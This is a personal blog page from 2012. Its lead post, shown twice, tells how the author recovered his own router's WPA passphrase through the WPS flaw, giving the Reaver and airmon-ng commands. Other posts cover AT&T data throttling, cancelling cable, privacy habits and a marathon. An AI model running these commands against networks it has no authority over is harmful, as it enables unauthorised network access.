I just broke the WPA encryption of my router, without having to be connected to it. Backtrack 5 with Reaver, from Tactical Solutions, did it. It was easy as pie. Boot backtrack 5 Install backtrack 5 Boot backtrack 5 from laptop Attach an atheros card to computer Run 4 commands: airmon-ng start wlan0 apt-get update apt-get install reaver reaver -i mon0 -b Mac-address-access-point -vv And 4 hours later I had the name of the access point, the WPS access code and the WPA passphrase. I get the actual passphrase, not some hash to pass around. I get into the mind of the administrator of that access point, what are they thinking and up to what heights when it comes to security. Password1 says a lot about you. Youw0ntbreakTh3passW0rdofth!s4cc3sspoint says even more. Thanks to Tactical Solutions, we need to bring our A game to protect the wireless network. The culprit? WPS or wireless protection setup. A good idea with some flaws in the implementation. My Cisco router? Guilty. Can I deactivate WPS? I thought I did that already by setting the network manually. Cisco, firmware update please. Last update for the e1000 was in May of 2011. Or, can I move the guts of my router to openwrt, that doesn't support WPS? Yep, another afternoon in the cave... Boy, I love when the crazy ideas get implemented so quickly.

29
Feb 12

Wireless has stopped being safe, again

I just broke the WPA encryption of my router, without having to be connected to it.

Backtrack 5 with Reaver, from Tactical Solutions, did it. It was easy as pie.
Boot backtrack 5
Install backtrack 5
Boot backtrack 5 from laptop
Attach an atheros card to computer
Run 4 commands:
airmon-ng start wlan0
apt-get update
apt-get install reaver
reaver -i mon0 -b Mac-address-access-point -vv

And 4 hours later I had the name of the access point, the WPS access code and the WPA passphrase. I get the actual passphrase, not some hash to pass around. I get into the mind of the administrator of that access point, what are they thinking and up to what heights when it comes to security. Password1 says a lot about you. Youw0ntbreakTh3passW0rdofth!s4cc3sspoint says even more.

Thanks to Tactical Solutions, we need to bring our A game to protect the wireless network. The culprit? WPS or wireless protection setup. A good idea with some flaws in the implementation. My Cisco router? Guilty. Can I deactivate WPS? I thought I did that already by setting the network manually. Cisco, firmware update please. Last update for the e1000 was in May of 2011. Or, can I move the guts of my router to openwrt, that doesn’t support WPS? Yep, another afternoon in the cave…

Boy, I love when the crazy ideas get implemented so quickly.


16
Feb 12

Rewriting the rules for Unlimited Data

I got this letter from AT&T this morning. Apparently I use too much data. I am a historic unlimited data usage person. I got into the plan early and stuck to it through bad coverage and dropped calls, AT&T’s coverage was poised to improve.

Like other wireless companies, AT&T is taking steps to manage exploding demand for mobile data. We’re responding on many levels, including investing billions in our wireless network this year and working to acquire more network capacity.

As mentioned on a previous bill, we’re also taking additional, more immediate steps to help address network congestion and improve reliability. One of these steps involves a change for some customers who use extraordinarily large amounts of data in a single billing period – about 12 times more data than the average smartphone user.

For the current billing cycle, your data usage indicates you could be affected by this change. Here’s how it works:

Smartphone customers with unlimited data plans may experience reduced speeds once their usage in a billing cycle reaches the level that puts them among the top 5 percent of heaviest data users. These customers can still use unlimited data and their speeds will be restored with the start of the next billing cycle.

We’re writing because you are in the top 5 percent of heaviest data users for this billing cycle. Because we recognize that data usage can change from month to month, you will not see reduced speeds this billing cycle.

Beginning with your next billing cycle, we’ll send you a text message if you are approaching the top 5 percent of heaviest data users. We’ll also send you a second text message if you cross into the top 5 percent of heaviest users, at which point you may see reduced speeds for the rest of the month.

Customers have several ways to manage extremely high data usage.

Wi-Fi offers great speeds and doesn’t add to your wireless data usage. Consider using Wi-Fi when possible for applications that use the highest amounts of data, such as streaming video apps, remote web camera apps, large data-file transfers (like video) and some online gaming.

You may also consider switching to a tiered data plan if speed is more important to you than having an unlimited data plan. Customers on tiered plans can pay for more data if they need it, and will not see reduced speeds.

To estimate how much data different activities use, and find out more about Wi-Fi or tiered data plans, visit https://www.att.com/dataplans or call Customer Care at 800-331-0500.

I have unlimited data. Let me use it. Learn from me how to improve bandwidth usage, the way Amazon does.

Did you see that the email doesn’t state the upper limit of the data usage? It is just 5% of heavier users. As users dial down their data usage, they bring that maximum back to the median. And this means that the 2GB Plan for corporate users now looks promising, because they are capped at a fixed value, not a month to month threshold. Have I reached the 2GB mark by February 14th? Is this a pre-emptive strike?

This means moving forward on plan B: an openWRT router that directs all the wireless traffic through a SSH tunnel, through the corporate firewall. Most of the knowledge is in place, but the pieces don’t fit together yet.

Fucking AT&T…


11
Feb 12

Life without cable

We were expecting a riot, mayhem, piles of dirty underwear for us to pick up. We got 10 minutes of uneasiness, it doesn’t work, change the channel, find the OTHER remote. And then, a beeline to Netflix. There was no denial or anger. Just plain acceptance. I need to learn from these two.


01
Feb 12

About privacy

Privacy: do we have the right to privacy in a social net? It is an oxymoron. How can you claim for privacy when using Facebook? How someone can be so moronic as to use the like button and claim for privacy? Even the business model of LinkedIn I find it shares too much.

What is my business? My business is to get as much as possible giving away as little as possible. Google is not here to give me search results. It is here to make money out of good searches. And it is in the business of gathering information about us. What do we read, buy, talk about or visit. And what do we search, of course; what are our immediate needs. So what again is my business? To provide a small footprint for every data gatherer. I use gmail, but I download the email to a mail client before reading it. I never search logged into a gmail account, because the searches are associated to the email and ip address. Ah, the ip address, how to fix that problem? After the recent spat of digital lockers going down, I set the servers to use a ssh tunnel into France or Luxembourg, so the google searches are stored towards a machine in France. Still, what about amazon? That is trickier, since they are my provider of choice on the net. But I’ll think of something. In the meantime, enjoy a life while not facebooking.


01
Feb 12

Houston Marathon

To those who care, I ran the marathon in 4:24:50. It was better than anticipated by my peers and close to my practice runs. 10:08 min/mile pace is not such a bad one. Since I went to do the weekly grocery shopping later in the day and then I went to drink beers with fellow runners, I decided to run again this March, at The Woodlands marathon. And so the training continues.